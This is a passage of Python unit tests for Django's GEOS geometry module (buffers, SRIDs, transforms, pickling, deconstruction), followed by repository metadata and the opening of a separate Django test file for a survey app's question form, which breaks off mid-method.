g.buffer_with_style(bg.width, end_cap_style=55)
# Can't use a floating-point for the join style.
with self.assertRaises(ctypes.ArgumentError):
g.buffer_with_style(bg.width, join_style=1.3)
# Can't use a join style that is not in the enum.
with self.assertRaises(GEOSException):
g.buffer_with_style(bg.width, join_style=66)
self._test_buffer(
itertools.chain(self.geometries.buffer_geoms, self.geometries.buffer_with_style_geoms),
'buffer_with_style',
)
def _test_buffer(self, geometries, buffer_method_name):
for bg in geometries:
g = fromstr(bg.wkt)
# The buffer we expect
exp_buf = fromstr(bg.buffer_wkt)
# Constructing our buffer
buf_kwargs = {
kwarg_name: getattr(bg, kwarg_name)
for kwarg_name in ('width', 'quadsegs', 'end_cap_style', 'join_style', 'mitre_limit')
if hasattr(bg, kwarg_name)
}
buf = getattr(g, buffer_method_name)(**buf_kwargs)
self.assertEqual(exp_buf.num_coords, buf.num_coords)
self.assertEqual(len(exp_buf), len(buf))
            # Now ensure that each point in the buffer is almost equal
for j in range(len(exp_buf)):
exp_ring = exp_buf[j]
buf_ring = buf[j]
self.assertEqual(len(exp_ring), len(buf_ring))
for k in range(len(exp_ring)):
# Asserting the X, Y of each point are almost equal (due to floating point imprecision)
self.assertAlmostEqual(exp_ring[k][0], buf_ring[k][0], 9)
self.assertAlmostEqual(exp_ring[k][1], buf_ring[k][1], 9)
def test_covers(self):
poly = Polygon(((0, 0), (0, 10), (10, 10), (10, 0), (0, 0)))
self.assertTrue(poly.covers(Point(5, 5)))
self.assertFalse(poly.covers(Point(100, 100)))
def test_closed(self):
ls_closed = LineString((0, 0), (1, 1), (0, 0))
ls_not_closed = LineString((0, 0), (1, 1))
self.assertFalse(ls_not_closed.closed)
self.assertTrue(ls_closed.closed)
def test_srid(self):
"Testing the SRID property and keyword."
# Testing SRID keyword on Point
pnt = Point(5, 23, srid=4326)
self.assertEqual(4326, pnt.srid)
pnt.srid = 3084
self.assertEqual(3084, pnt.srid)
with self.assertRaises(ctypes.ArgumentError):
pnt.srid = '4326'
# Testing SRID keyword on fromstr(), and on Polygon rings.
poly = fromstr(self.geometries.polygons[1].wkt, srid=4269)
self.assertEqual(4269, poly.srid)
for ring in poly:
self.assertEqual(4269, ring.srid)
poly.srid = 4326
self.assertEqual(4326, poly.shell.srid)
# Testing SRID keyword on GeometryCollection
gc = GeometryCollection(Point(5, 23), LineString((0, 0), (1.5, 1.5), (3, 3)), srid=32021)
self.assertEqual(32021, gc.srid)
for i in range(len(gc)):
self.assertEqual(32021, gc[i].srid)
# GEOS may get the SRID from HEXEWKB
# 'POINT(5 23)' at SRID=4326 in hex form -- obtained from PostGIS
# using `SELECT GeomFromText('POINT (5 23)', 4326);`.
hex = '0101000020E610000000000000000014400000000000003740'
p1 = fromstr(hex)
self.assertEqual(4326, p1.srid)
p2 = fromstr(p1.hex)
self.assertIsNone(p2.srid)
p3 = fromstr(p1.hex, srid=-1) # -1 is intended.
self.assertEqual(-1, p3.srid)
# Testing that geometry SRID could be set to its own value
pnt_wo_srid = Point(1, 1)
pnt_wo_srid.srid = pnt_wo_srid.srid
# Input geometries that have an SRID.
self.assertEqual(GEOSGeometry(pnt.ewkt, srid=pnt.srid).srid, pnt.srid)
self.assertEqual(GEOSGeometry(pnt.ewkb, srid=pnt.srid).srid, pnt.srid)
with self.assertRaisesMessage(ValueError, 'Input geometry already has SRID: %d.' % pnt.srid):
GEOSGeometry(pnt.ewkt, srid=1)
with self.assertRaisesMessage(ValueError, 'Input geometry already has SRID: %d.' % pnt.srid):
GEOSGeometry(pnt.ewkb, srid=1)
def test_custom_srid(self):
"""Test with a null srid and a srid unknown to GDAL."""
for srid in [None, 999999]:
pnt = Point(111200, 220900, srid=srid)
self.assertTrue(pnt.ewkt.startswith(("SRID=%s;" % srid if srid else '') + "POINT (111200"))
self.assertIsInstance(pnt.ogr, gdal.OGRGeometry)
self.assertIsNone(pnt.srs)
# Test conversion from custom to a known srid
c2w = gdal.CoordTransform(
gdal.SpatialReference(
'+proj=mill +lat_0=0 +lon_0=0 +x_0=0 +y_0=0 +R_A +ellps=WGS84 '
'+datum=WGS84 +units=m +no_defs'
),
gdal.SpatialReference(4326))
new_pnt = pnt.transform(c2w, clone=True)
self.assertEqual(new_pnt.srid, 4326)
self.assertAlmostEqual(new_pnt.x, 1, 1)
self.assertAlmostEqual(new_pnt.y, 2, 1)
def test_mutable_geometries(self):
"Testing the mutability of Polygons and Geometry Collections."
# ### Testing the mutability of Polygons ###
for p in self.geometries.polygons:
poly = fromstr(p.wkt)
# Should only be able to use __setitem__ with LinearRing geometries.
with self.assertRaises(TypeError):
poly.__setitem__(0, LineString((1, 1), (2, 2)))
# Constructing the new shell by adding 500 to every point in the old shell.
shell_tup = poly.shell.tuple
new_coords = []
for point in shell_tup:
new_coords.append((point[0] + 500., point[1] + 500.))
new_shell = LinearRing(*tuple(new_coords))
# Assigning polygon's exterior ring w/the new shell
poly.exterior_ring = new_shell
str(new_shell) # new shell is still accessible
self.assertEqual(poly.exterior_ring, new_shell)
self.assertEqual(poly[0], new_shell)
# ### Testing the mutability of Geometry Collections
for tg in self.geometries.multipoints:
mp = fromstr(tg.wkt)
for i in range(len(mp)):
# Creating a random point.
pnt = mp[i]
new = Point(random.randint(21, 100), random.randint(21, 100))
# Testing the assignment
mp[i] = new
str(new) # what was used for the assignment is still accessible
self.assertEqual(mp[i], new)
self.assertEqual(mp[i].wkt, new.wkt)
self.assertNotEqual(pnt, mp[i])
# MultiPolygons involve much more memory management because each
# Polygon w/in the collection has its own rings.
for tg in self.geometries.multipolygons:
mpoly = fromstr(tg.wkt)
for i in range(len(mpoly)):
poly = mpoly[i]
old_poly = mpoly[i]
                # Offset each ring in the polygon by 500.
for j in range(len(poly)):
r = poly[j]
for k in range(len(r)):
r[k] = (r[k][0] + 500., r[k][1] + 500.)
poly[j] = r
self.assertNotEqual(mpoly[i], poly)
# Testing the assignment
mpoly[i] = poly
str(poly) # Still accessible
self.assertEqual(mpoly[i], poly)
self.assertNotEqual(mpoly[i], old_poly)
        # Extreme (!!) __setitem__ no longer works: the first object would have
        # to detect that __setitem__ was called on the subsequent objects --
        # maybe mpoly[0, 0, 0] = (3.14, 2.71)?
# mpoly[0][0][0] = (3.14, 2.71)
# self.assertEqual((3.14, 2.71), mpoly[0][0][0])
# Doing it more slowly..
# self.assertEqual((3.14, 2.71), mpoly[0].shell[0])
# del mpoly
def test_point_list_assignment(self):
p = Point(0, 0)
p[:] = (1, 2, 3)
self.assertEqual(p, Point(1, 2, 3))
p[:] = ()
self.assertEqual(p.wkt, Point())
p[:] = (1, 2)
self.assertEqual(p.wkt, Point(1, 2))
with self.assertRaises(ValueError):
p[:] = (1,)
with self.assertRaises(ValueError):
p[:] = (1, 2, 3, 4, 5)
def test_linestring_list_assignment(self):
ls = LineString((0, 0), (1, 1))
ls[:] = ()
self.assertEqual(ls, LineString())
ls[:] = ((0, 0), (1, 1), (2, 2))
self.assertEqual(ls, LineString((0, 0), (1, 1), (2, 2)))
with self.assertRaises(ValueError):
ls[:] = (1,)
def test_linearring_list_assignment(self):
ls = LinearRing((0, 0), (0, 1), (1, 1), (0, 0))
ls[:] = ()
self.assertEqual(ls, LinearRing())
ls[:] = ((0, 0), (0, 1), (1, 1), (1, 0), (0, 0))
self.assertEqual(ls, LinearRing((0, 0), (0, 1), (1, 1), (1, 0), (0, 0)))
with self.assertRaises(ValueError):
ls[:] = ((0, 0), (1, 1), (2, 2))
def test_polygon_list_assignment(self):
pol = Polygon()
pol[:] = (((0, 0), (0, 1), (1, 1), (1, 0), (0, 0)),)
self.assertEqual(pol, Polygon(((0, 0), (0, 1), (1, 1), (1, 0), (0, 0)),))
pol[:] = ()
self.assertEqual(pol, Polygon())
def test_geometry_collection_list_assignment(self):
p = Point()
gc = GeometryCollection()
gc[:] = [p]
self.assertEqual(gc, GeometryCollection(p))
gc[:] = ()
self.assertEqual(gc, GeometryCollection())
def test_threed(self):
"Testing three-dimensional geometries."
# Testing a 3D Point
pnt = Point(2, 3, 8)
self.assertEqual((2., 3., 8.), pnt.coords)
with self.assertRaises(TypeError):
pnt.tuple = (1., 2.)
pnt.coords = (1., 2., 3.)
self.assertEqual((1., 2., 3.), pnt.coords)
# Testing a 3D LineString
ls = LineString((2., 3., 8.), (50., 250., -117.))
self.assertEqual(((2., 3., 8.), (50., 250., -117.)), ls.tuple)
with self.assertRaises(TypeError):
ls.__setitem__(0, (1., 2.))
ls[0] = (1., 2., 3.)
self.assertEqual((1., 2., 3.), ls[0])
def test_distance(self):
"Testing the distance() function."
# Distance to self should be 0.
pnt = Point(0, 0)
self.assertEqual(0.0, pnt.distance(Point(0, 0)))
# Distance should be 1
self.assertEqual(1.0, pnt.distance(Point(0, 1)))
# Distance should be ~ sqrt(2)
self.assertAlmostEqual(1.41421356237, pnt.distance(Point(1, 1)), 11)
# Distances are from the closest vertex in each geometry --
# should be 3 (distance from (2, 2) to (5, 2)).
ls1 = LineString((0, 0), (1, 1), (2, 2))
ls2 = LineString((5, 2), (6, 1), (7, 0))
self.assertEqual(3, ls1.distance(ls2))
def test_length(self):
"Testing the length property."
# Points have 0 length.
pnt = Point(0, 0)
self.assertEqual(0.0, pnt.length)
# Should be ~ sqrt(2)
ls = LineString((0, 0), (1, 1))
self.assertAlmostEqual(1.41421356237, ls.length, 11)
# Should be circumference of Polygon
poly = Polygon(LinearRing((0, 0), (0, 1), (1, 1), (1, 0), (0, 0)))
self.assertEqual(4.0, poly.length)
# Should be sum of each element's length in collection.
mpoly = MultiPolygon(poly.clone(), poly)
self.assertEqual(8.0, mpoly.length)
def test_emptyCollections(self):
"Testing empty geometries and collections."
geoms = [
GeometryCollection([]),
fromstr('GEOMETRYCOLLECTION EMPTY'),
GeometryCollection(),
fromstr('POINT EMPTY'),
Point(),
fromstr('LINESTRING EMPTY'),
LineString(),
fromstr('POLYGON EMPTY'),
Polygon(),
fromstr('MULTILINESTRING EMPTY'),
MultiLineString(),
fromstr('MULTIPOLYGON EMPTY'),
MultiPolygon(()),
MultiPolygon(),
]
if numpy:
geoms.append(LineString(numpy.array([])))
for g in geoms:
self.assertIs(g.empty, True)
# Testing len() and num_geom.
if isinstance(g, Polygon):
self.assertEqual(1, len(g)) # Has one empty linear ring
self.assertEqual(1, g.num_geom)
self.assertEqual(0, len(g[0]))
elif isinstance(g, (Point, LineString)):
self.assertEqual(1, g.num_geom)
self.assertEqual(0, len(g))
else:
self.assertEqual(0, g.num_geom)
self.assertEqual(0, len(g))
# Testing __getitem__ (doesn't work on Point or Polygon)
if isinstance(g, Point):
# IndexError is not raised in GEOS 3.8.0.
if geos_version_tuple() != (3, 8, 0):
with self.assertRaises(IndexError):
g.x
elif isinstance(g, Polygon):
lr = g.shell
self.assertEqual('LINEARRING EMPTY', lr.wkt)
self.assertEqual(0, len(lr))
self.assertIs(lr.empty, True)
with self.assertRaises(IndexError):
lr.__getitem__(0)
else:
with self.assertRaises(IndexError):
g.__getitem__(0)
def test_collection_dims(self):
gc = GeometryCollection([])
self.assertEqual(gc.dims, -1)
gc = GeometryCollection(Point(0, 0))
self.assertEqual(gc.dims, 0)
gc = GeometryCollection(LineString((0, 0), (1, 1)), Point(0, 0))
self.assertEqual(gc.dims, 1)
gc = GeometryCollection(LineString((0, 0), (1, 1)), Polygon(((0, 0), (0, 1), (1, 1), (0, 0))), Point(0, 0))
self.assertEqual(gc.dims, 2)
def test_collections_of_collections(self):
"Testing GeometryCollection handling of other collections."
# Creating a GeometryCollection WKT string composed of other
# collections and polygons.
coll = [mp.wkt for mp in self.geometries.multipolygons if mp.valid]
coll.extend(mls.wkt for mls in self.geometries.multilinestrings)
coll.extend(p.wkt for p in self.geometries.polygons)
coll.extend(mp.wkt for mp in self.geometries.multipoints)
gc_wkt = 'GEOMETRYCOLLECTION(%s)' % ','.join(coll)
# Should construct ok from WKT
gc1 = GEOSGeometry(gc_wkt)
# Should also construct ok from individual geometry arguments.
gc2 = GeometryCollection(*tuple(g for g in gc1))
# And, they should be equal.
self.assertEqual(gc1, gc2)
def test_gdal(self):
"Testing `ogr` and `srs` properties."
g1 = fromstr('POINT(5 23)')
self.assertIsInstance(g1.ogr, gdal.OGRGeometry)
self.assertIsNone(g1.srs)
g1_3d = fromstr('POINT(5 23 8)')
self.assertIsInstance(g1_3d.ogr, gdal.OGRGeometry)
self.assertEqual(g1_3d.ogr.z, 8)
g2 = fromstr('LINESTRING(0 0, 5 5, 23 23)', srid=4326)
self.assertIsInstance(g2.ogr, gdal.OGRGeometry)
self.assertIsInstance(g2.srs, gdal.SpatialReference)
self.assertEqual(g2.hex, g2.ogr.hex)
self.assertEqual('WGS 84', g2.srs.name)
def test_copy(self):
"Testing use with the Python `copy` module."
import copy
poly = GEOSGeometry('POLYGON((0 0, 0 23, 23 23, 23 0, 0 0), (5 5, 5 10, 10 10, 10 5, 5 5))')
cpy1 = copy.copy(poly)
cpy2 = copy.deepcopy(poly)
self.assertNotEqual(poly._ptr, cpy1._ptr)
self.assertNotEqual(poly._ptr, cpy2._ptr)
def test_transform(self):
"Testing `transform` method."
orig = GEOSGeometry('POINT (-104.609 38.255)', 4326)
trans = GEOSGeometry('POINT (992385.4472045 481455.4944650)', 2774)
# Using a srid, a SpatialReference object, and a CoordTransform object
# for transformations.
t1, t2, t3 = orig.clone(), orig.clone(), orig.clone()
t1.transform(trans.srid)
t2.transform(gdal.SpatialReference('EPSG:2774'))
ct = gdal.CoordTransform(gdal.SpatialReference('WGS84'), gdal.SpatialReference(2774))
t3.transform(ct)
# Testing use of the `clone` keyword.
k1 = orig.clone()
k2 = k1.transform(trans.srid, clone=True)
self.assertEqual(k1, orig)
self.assertNotEqual(k1, k2)
        # Different PROJ versions use different transformations; all are
        # correct to within 1 meter accuracy.
prec = -1
for p in (t1, t2, t3, k2):
self.assertAlmostEqual(trans.x, p.x, prec)
self.assertAlmostEqual(trans.y, p.y, prec)
def test_transform_3d(self):
p3d = GEOSGeometry('POINT (5 23 100)', 4326)
p3d.transform(2774)
self.assertAlmostEqual(p3d.z, 100, 3)
def test_transform_noop(self):
""" Testing `transform` method (SRID match) """
# transform() should no-op if source & dest SRIDs match,
# regardless of whether GDAL is available.
g = GEOSGeometry('POINT (-104.609 38.255)', 4326)
gt = g.tuple
g.transform(4326)
self.assertEqual(g.tuple, gt)
self.assertEqual(g.srid, 4326)
g = GEOSGeometry('POINT (-104.609 38.255)', 4326)
g1 = g.transform(4326, clone=True)
self.assertEqual(g1.tuple, g.tuple)
self.assertEqual(g1.srid, 4326)
self.assertIsNot(g1, g, "Clone didn't happen")
def test_transform_nosrid(self):
""" Testing `transform` method (no SRID or negative SRID) """
g = GEOSGeometry('POINT (-104.609 38.255)', srid=None)
with self.assertRaises(GEOSException):
g.transform(2774)
g = GEOSGeometry('POINT (-104.609 38.255)', srid=None)
with self.assertRaises(GEOSException):
g.transform(2774, clone=True)
g = GEOSGeometry('POINT (-104.609 38.255)', srid=-1)
with self.assertRaises(GEOSException):
g.transform(2774)
g = GEOSGeometry('POINT (-104.609 38.255)', srid=-1)
with self.assertRaises(GEOSException):
g.transform(2774, clone=True)
def test_extent(self):
"Testing `extent` method."
# The xmin, ymin, xmax, ymax of the MultiPoint should be returned.
mp = MultiPoint(Point(5, 23), Point(0, 0), Point(10, 50))
self.assertEqual((0.0, 0.0, 10.0, 50.0), mp.extent)
pnt = Point(5.23, 17.8)
# Extent of points is just the point itself repeated.
self.assertEqual((5.23, 17.8, 5.23, 17.8), pnt.extent)
# Testing on the 'real world' Polygon.
poly = fromstr(self.geometries.polygons[3].wkt)
ring = poly.shell
x, y = ring.x, ring.y
xmin, ymin = min(x), min(y)
xmax, ymax = max(x), max(y)
self.assertEqual((xmin, ymin, xmax, ymax), poly.extent)
def test_pickle(self):
"Testing pickling and unpickling support."
# Creating a list of test geometries for pickling,
# and setting the SRID on some of them.
def get_geoms(lst, srid=None):
return [GEOSGeometry(tg.wkt, srid) for tg in lst]
tgeoms = get_geoms(self.geometries.points)
tgeoms.extend(get_geoms(self.geometries.multilinestrings, 4326))
tgeoms.extend(get_geoms(self.geometries.polygons, 3084))
tgeoms.extend(get_geoms(self.geometries.multipolygons, 3857))
tgeoms.append(Point(srid=4326))
tgeoms.append(Point())
for geom in tgeoms:
s1 = pickle.dumps(geom)
g1 = pickle.loads(s1)
self.assertEqual(geom, g1)
self.assertEqual(geom.srid, g1.srid)
def test_prepared(self):
"Testing PreparedGeometry support."
# Creating a simple multipolygon and getting a prepared version.
mpoly = GEOSGeometry('MULTIPOLYGON(((0 0,0 5,5 5,5 0,0 0)),((5 5,5 10,10 10,10 5,5 5)))')
prep = mpoly.prepared
# A set of test points.
pnts = [Point(5, 5), Point(7.5, 7.5), Point(2.5, 7.5)]
for pnt in pnts:
# Results should be the same (but faster)
self.assertEqual(mpoly.contains(pnt), prep.contains(pnt))
self.assertEqual(mpoly.intersects(pnt), prep.intersects(pnt))
self.assertEqual(mpoly.covers(pnt), prep.covers(pnt))
self.assertTrue(prep.crosses(fromstr('LINESTRING(1 1, 15 15)')))
self.assertTrue(prep.disjoint(Point(-5, -5)))
poly = Polygon(((-1, -1), (1, 1), (1, 0), (-1, -1)))
self.assertTrue(prep.overlaps(poly))
poly = Polygon(((-5, 0), (-5, 5), (0, 5), (-5, 0)))
self.assertTrue(prep.touches(poly))
poly = Polygon(((-1, -1), (-1, 11), (11, 11), (11, -1), (-1, -1)))
self.assertTrue(prep.within(poly))
# Original geometry deletion should not crash the prepared one (#21662)
del mpoly
self.assertTrue(prep.covers(Point(5, 5)))
def test_line_merge(self):
"Testing line merge support"
ref_geoms = (fromstr('LINESTRING(1 1, 1 1, 3 3)'),
fromstr('MULTILINESTRING((1 1, 3 3), (3 3, 4 2))'),
)
ref_merged = (fromstr('LINESTRING(1 1, 3 3)'),
fromstr('LINESTRING (1 1, 3 3, 4 2)'),
)
for geom, merged in zip(ref_geoms, ref_merged):
self.assertEqual(merged, geom.merged)
def test_valid_reason(self):
"Testing IsValidReason support"
g = GEOSGeometry("POINT(0 0)")
self.assertTrue(g.valid)
self.assertIsInstance(g.valid_reason, str)
self.assertEqual(g.valid_reason, "Valid Geometry")
g = GEOSGeometry("LINESTRING(0 0, 0 0)")
self.assertFalse(g.valid)
self.assertIsInstance(g.valid_reason, str)
self.assertTrue(g.valid_reason.startswith("Too few points in geometry component"))
def test_linearref(self):
"Testing linear referencing"
ls = fromstr('LINESTRING(0 0, 0 10, 10 10, 10 0)')
mls = fromstr('MULTILINESTRING((0 0, 0 10), (10 0, 10 10))')
self.assertEqual(ls.project(Point(0, 20)), 10.0)
self.assertEqual(ls.project(Point(7, 6)), 24)
self.assertEqual(ls.project_normalized(Point(0, 20)), 1.0 / 3)
self.assertEqual(ls.interpolate(10), Point(0, 10))
self.assertEqual(ls.interpolate(24), Point(10, 6))
self.assertEqual(ls.interpolate_normalized(1.0 / 3), Point(0, 10))
self.assertEqual(mls.project(Point(0, 20)), 10)
self.assertEqual(mls.project(Point(7, 6)), 16)
self.assertEqual(mls.interpolate(9), Point(0, 9))
self.assertEqual(mls.interpolate(17), Point(10, 7))
def test_deconstructible(self):
"""
Geometry classes should be deconstructible.
"""
point = Point(4.337844, 50.827537, srid=4326)
path, args, kwargs = point.deconstruct()
self.assertEqual(path, 'django.contrib.gis.geos.point.Point')
self.assertEqual(args, (4.337844, 50.827537))
self.assertEqual(kwargs, {'srid': 4326})
ls = LineString(((0, 0), (1, 1)))
path, args, kwargs = ls.deconstruct()
self.assertEqual(path, 'django.contrib.gis.geos.linestring.LineString')
self.assertEqual(args, (((0, 0), (1, 1)),))
self.assertEqual(kwargs, {})
ls2 = LineString([Point(0, 0), Point(1, 1)], srid=4326)
path, args, kwargs = ls2.deconstruct()
self.assertEqual(path, 'django.contrib.gis.geos.linestring.LineString')
self.assertEqual(args, ([Point(0, 0), Point(1, 1)],))
self.assertEqual(kwargs, {'srid': 4326})
ext_coords = ((0, 0), (0, 1), (1, 1), (1, 0), (0, 0))
int_coords = ((0.4, 0.4), (0.4, 0.6), (0.6, 0.6), (0.6, 0.4), (0.4, 0.4))
poly = Polygon(ext_coords, int_coords)
path, args, kwargs = poly.deconstruct()
self.assertEqual(path, 'django.contrib.gis.geos.polygon.Polygon')
self.assertEqual(args, (ext_coords, int_coords))
self.assertEqual(kwargs, {})
lr = LinearRing((0, 0), (0, 1), (1, 1), (0, 0))
path, args, kwargs = lr.deconstruct()
self.assertEqual(path, 'django.contrib.gis.geos.linestring.LinearRing')
self.assertEqual(args, ((0, 0), (0, 1), (1, 1), (0, 0)))
self.assertEqual(kwargs, {})
mp = MultiPoint(Point(0, 0), Point(1, 1))
path, args, kwargs = mp.deconstruct()
self.assertEqual(path, 'django.contrib.gis.geos.collections.MultiPoint')
self.assertEqual(args, (Point(0, 0), Point(1, 1)))
self.assertEqual(kwargs, {})
ls1 = LineString((0, 0), (1, 1))
ls2 = LineString((2, 2), (3, 3))
mls = MultiLineString(ls1, ls2)
path, args, kwargs = mls.deconstruct()
self.assertEqual(path, 'django.contrib.gis.geos.collections.MultiLineString')
self.assertEqual(args, (ls1, ls2))
self.assertEqual(kwargs, {})
p1 = Polygon(((0, 0), (0, 1), (1, 1), (0, 0)))
p2 = Polygon(((1, 1), (1, 2), (2, 2), (1, 1)))
mp = MultiPolygon(p1, p2)
path, args, kwargs = mp.deconstruct()
self.assertEqual(path, 'django.contrib.gis.geos.collections.MultiPolygon')
self.assertEqual(args, (p1, p2))
self.assertEqual(kwargs, {})
poly = Polygon(((0, 0), (0, 1), (1, 1), (0, 0)))
gc = GeometryCollection(Point(0, 0), MultiPoint(Point(0, 0), Point(1, 1)), poly)
path, args, kwargs = gc.deconstruct()
self.assertEqual(path, 'django.contrib.gis.geos.collections.GeometryCollection')
self.assertEqual(args, (Point(0, 0), MultiPoint(Point(0, 0), Point(1, 1)), poly))
self.assertEqual(kwargs, {})
def test_subclassing(self):
"""
GEOSGeometry subclass may itself be subclassed without being forced-cast
to the parent class during `__init__`.
"""
class ExtendedPolygon(Polygon):
def __init__(self, *args, data=0, **kwargs):
super().__init__(*args, **kwargs)
self._data = data
def __str__(self):
return "EXT_POLYGON - data: %d - %s" % (self._data, self.wkt)
ext_poly = ExtendedPolygon(((0, 0), (0, 1), (1, 1), (0, 0)), data=3)
self.assertEqual(type(ext_poly), ExtendedPolygon)
# ExtendedPolygon.__str__ should be called (instead of Polygon.__str__).
self.assertEqual(str(ext_poly), "EXT_POLYGON - data: 3 - POLYGON ((0 0, 0 1, 1 1, 0 0))")
self.assertJSONEqual(
ext_poly.json,
'{"coordinates": [[[0, 0], [0, 1], [1, 1], [0, 0]]], "type": "Polygon"}',
)
def test_geos_version_tuple(self):
versions = (
(b'3.0.0rc4-CAPI-1.3.3', (3, 0, 0)),
(b'3.0.0-CAPI-1.4.1', (3, 0, 0)),
(b'3.4.0dev-CAPI-1.8.0', (3, 4, 0)),
(b'3.4.0dev-CAPI-1.8.0 r0', (3, 4, 0)),
(b'3.6.2-CAPI-1.10.2 4d2925d6', (3, 6, 2)),
)
for version_string, version_tuple in versions:
with self.subTest(version_string=version_string):
with mock.patch('django.contrib.gis.geos.libgeos.geos_version', lambda: version_string):
self.assertEqual(geos_version_tuple(), version_tuple)
def test_from_gml(self):
self.assertEqual(
GEOSGeometry('POINT(0 0)'),
GEOSGeometry.from_gml(
'<gml:Point gml:id="p21" srsName="http://www.opengis.net/def/crs/EPSG/0/4326">'
' <gml:pos srsDimension="2">0 0</gml:pos>'
'</gml:Point>'
),
)
def test_from_ewkt(self):
self.assertEqual(GEOSGeometry.from_ewkt('SRID=1;POINT(1 1)'), Point(1, 1, srid=1))
self.assertEqual(GEOSGeometry.from_ewkt('POINT(1 1)'), Point(1, 1))
def test_from_ewkt_empty_string(self):
msg = 'Expected WKT but got an empty string.'
with self.assertRaisesMessage(ValueError, msg):
GEOSGeometry.from_ewkt('')
with self.assertRaisesMessage(ValueError, msg):
GEOSGeometry.from_ewkt('SRID=1;')
def test_from_ewkt_invalid_srid(self):
msg = 'EWKT has invalid SRID part.'
with self.assertRaisesMessage(ValueError, msg):
GEOSGeometry.from_ewkt('SRUD=1;POINT(1 1)')
with self.assertRaisesMessage(ValueError, msg):
GEOSGeometry.from_ewkt('SRID=WGS84;POINT(1 1)')
def test_fromstr_scientific_wkt(self):
self.assertEqual(GEOSGeometry('POINT(1.0e-1 1.0e+1)'), Point(.1, 10))
def test_normalize(self):
g = MultiPoint(Point(0, 0), Point(2, 2), Point(1, 1))
self.assertIsNone(g.normalize())
self.assertTrue(g.equals_exact(MultiPoint(Point(2, 2), Point(1, 1), Point(0, 0))))
def test_empty_point(self):
p = Point(srid=4326)
self.assertEqual(p.ogr.ewkt, p.ewkt)
self.assertEqual(p.transform(2774, clone=True), Point(srid=2774))
p.transform(2774)
self.assertEqual(p, Point(srid=2774))
def test_linestring_iter(self):
ls = LineString((0, 0), (1, 1))
it = iter(ls)
# Step into CoordSeq iterator.
next(it)
ls[:] = []
with self.assertRaises(IndexError):
next(it)
| {
"content_hash": "6ec871573ec70e87faa910bb3da28ba2",
"timestamp": "",
"source": "github",
"line_count": 1449,
"max_line_length": 115,
"avg_line_length": 40.50310559006211,
"alnum_prop": 0.5701920291707134,
"repo_name": "koordinates/django",
"id": "d1496a3b3eae1ac2ec198afad1fabc22f1a16b86",
"size": "58689",
"binary": false,
"copies": "1",
"ref": "refs/heads/stable/3.2.x-kx",
"path": "tests/gis_tests/geos_tests/test_geos.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "84917"
},
{
"name": "HTML",
"bytes": "223820"
},
{
"name": "JavaScript",
"bytes": "139791"
},
{
"name": "Makefile",
"bytes": "125"
},
{
"name": "Procfile",
"bytes": "47"
},
{
"name": "Python",
"bytes": "14472067"
},
{
"name": "Shell",
"bytes": "809"
},
{
"name": "Smarty",
"bytes": "142"
}
],
"symlink_target": ""
} |
from django.test import TestCase
from survey.forms.question import *
from survey.models import Batch
from survey.models.question import Question
from survey.models.householdgroups import HouseholdMemberGroup
class QuestionFormTest(TestCase):
def setUp(self):
self.batch = Batch.objects.create(name='Batch A',description='description')
self.household_member_group = HouseholdMemberGroup.objects.create(name='Age 4-5', order=1)
self.question_module = QuestionModule.objects.create(name="Education")
self.form_data = {
'batch': self.batch.id,
'text': 'whaat?',
'answer_type': Question.NUMBER,
'identifier': 'ID 1',
'options':"some option text",
'group' : self.household_member_group.id,
'module' : self.question_module.id
}
def test_valid(self):
question_form = QuestionForm(self.form_data)
question_form.is_valid()
self.assertTrue(question_form.is_valid())
def test_invalid(self):
question_form = QuestionForm()
self.assertFalse(question_form.is_valid())
def test_question_form_fields(self):
question_form = QuestionForm()
fields = ['module', 'text', 'answer_type', 'group']
[self.assertIn(field, question_form.fields) for field in fields]
def test_question_form_has_tuple_of_all_question_modules_as_choices(self):
health_module = QuestionModule.objects.create(name="Health")
education_module = QuestionModule.objects.create(name="Education")
question_modules = [health_module, education_module]
question_form = QuestionForm()
[self.assertIn((module.id, module.name), question_form.fields['module'].choices) for module in question_modules]
def test_question_form_has_no_choices_if_there_are_no_question_modules(self):
QuestionModule.objects.all().delete()
question_form = QuestionForm()
self.assertEqual(0, len(question_form.fields['module'].choices))
def test_should_know_household_member_group_id_and_name_tuple_is_the_group_choice(self):
question_form = QuestionForm(self.form_data)
self.assertEqual(question_form.fields['group'].choices, [(self.household_member_group.id, self.household_member_group.name)])
def test_should_not_save_multichoice_question_if_no_options_given(self):
form_data = self.form_data.copy()
form_data['answer_type'] = Question.MULTICHOICE
form_data['options']=''
question_form = QuestionForm(form_data)
self.assertFalse(question_form.is_valid())
expected_form_error = 'Question Options missing.'
self.assertEqual(1, len(question_form.errors['answer_type']))
self.assertEqual(expected_form_error, question_form.errors['answer_type'][0])
def test_should_save_options_and_batch_attached_to_questions_if_supplied(self):
form_data = self.form_data.copy()
form_data['answer_type'] = Question.MULTICHOICE
form_data['options']=['option 1', 'option 2']
question_form = QuestionForm(form_data)
self.assertTrue(question_form.is_valid())
batch = Batch.objects.create()
question = question_form.save(batch=batch, group=[self.household_member_group.id])
self.assertEqual(1, question.batches.all().count())
self.assertEqual(batch, question.batches.all()[0])
options = question.options.all()
self.assertEqual(2, options.count())
self.assertIn(QuestionOption.objects.get(text=form_data['options'][0]), options)
self.assertIn(QuestionOption.objects.get(text=form_data['options'][1]), options)
def test_should_save_questions_and_options_even_if_batch_is_not_supplied(self):
form_data = self.form_data.copy()
form_data['answer_type'] = Question.MULTICHOICE
form_data['options']=['option 1', 'option 2']
question_form = QuestionForm(form_data)
self.assertTrue(question_form.is_valid())
question = question_form.save(group=[self.household_member_group.id])
self.assertEqual(0, len(question.batches.all()))
options = question.options.all()
self.assertEqual(2, options.count())
self.assertIn(QuestionOption.objects.get(text=form_data['options'][0]), options)
self.assertIn(QuestionOption.objects.get(text=form_data['options'][1]), options)
def test_should_edit_options_text_and_order_of_question_if_supplied(self):
form_data = self.form_data.copy()
form_data['answer_type'] = Question.MULTICHOICE
form_data['options']=['option 1', 'option 2']
question_form = QuestionForm(form_data)
question = question_form.save(group=[self.household_member_group.id])
form_data['options'] = ['option 2', 'option aaaaaaa 1']
question_form = QuestionForm(instance=question, data=form_data)
edited_question = question_form.save(group=[self.household_member_group.id])
options = question.options.all()
self.assertEqual(2, options.count())
self.assertEqual(QuestionOption.objects.get(text=form_data['options'][0], order=1), options[0])
self.assertEqual(QuestionOption.objects.get(text=form_data['options'][1], order=2), options[1])
self.assertFalse(QuestionOption.objects.filter(text='option 1'))
self.assertEqual(question.id, edited_question.id)
def test_should_not_save_options_if_not_multichoice_even_if_options_supplied(self):
form_data = self.form_data.copy()
